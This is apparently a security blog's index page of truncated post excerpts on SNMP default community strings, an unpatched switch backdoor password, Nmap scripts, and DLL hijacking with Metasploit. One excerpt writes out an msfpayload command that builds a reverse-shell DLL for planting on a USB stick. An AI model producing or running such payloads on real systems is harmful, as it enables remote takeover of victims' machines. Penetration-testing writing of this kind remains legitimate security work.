First, if you’ve never fully researched SNMP (Simple Network Management Protocol), I suggest you go do that now because you’re doing yourself a major disservice by not knowing/using the information that’s available through the use of this protocol… not to mention the amount of remote control you have over a machine if you’re able to get an administrative community string.
Most network devices that come with SNMP enabled have two (or more) different community strings. A community string is, basically, the only authentication you need in order to gain access through SNMP. There will be a “read only” community string (usually ‘public’), and a read/write community string (usually ‘private’). Lately, developers have been doing a better job at making sure that the default community strings don’t come with read/write enabled, but not all. Read the rest of this entry »
This just came across and it’s pretty interesting. I haven’t heard of/seen this before, so I figured I’d repost it here. I don’t usually like to regurgitate stuff, but if I have nothing to write myself and I come across something that I consider to be valuable, interesting, insightful, or whatever, I will.
On the 15th of august 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent [1][2]. Even though this is a >365-day exploit, it does not seem to be listed in any of the vulnerability databases. Also, I could not find a patch for any of the vulnerable devices. According to the researchers, they contacted 3Com and Accton, but did not receive a response. I have a vulnerable 3Com 3812 in my lab and contacted the 3Com SRT months ago, but did not receive a response either. This seems to be a forgotten bug… Read the rest of this entry »
I decided that it might be useful to be able to utilize DLL hijacking with Autorun.. here’s the outcome.
# msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: LHOST=192.168.0.58 Read the rest of this entry »
This is a quick video demonstrating the “webdav_dll_hijacker” Metasploit module. In this video, I target Windows Address Book (.vcf/wab32res.dll) (Best viewed in fullscreen mode in 480p or higher. Youtube absolutely killed the video quality. Thanks Youtube!)
Just to make sure this is clear.. the window on the left side of the screen is my Linux box.. and the window on the right side is my VMWare image of Windows XP SP2.
UPDATE:
One thing that I didn’t mention in this post is that these files do NOT have to be saved to a share. So long as the file and the DLL reside in the same directory (think USB stick), the exploitation will succeed. /UPDATE
So, yesterday I wrote a post detailing the exploitation of this vulnerability using the “webdav_dll_hijacker” module. The problem with this method is that you have to convince a user to connect to a rogue share. This adds some hoops to jump through, as you have to social engineer/trick someone to browse to it.
Well, here’s an alternative that doesn’t require any trickery.
I cannot say enough good things about NSE (Nmap Scripting Engine). I’ve written a couple of posts about it and why I find it so useful, but in this post I’m going to cover some of my favorite scripts that come with the most recent Nmap release (5.35 DC1 (The DefCon release.. oooh. ).
The first one is ‘http-enum’. This is a pretty simple directory enumeration, but the information obtained through the use of this script can be priceless. Here’s an example:
HD Moore (Metasploit) has just released an update to his original DLLHiJackAuditKit which further automates the process of discovering programs which are vulnerable to this attack. You can find his post here
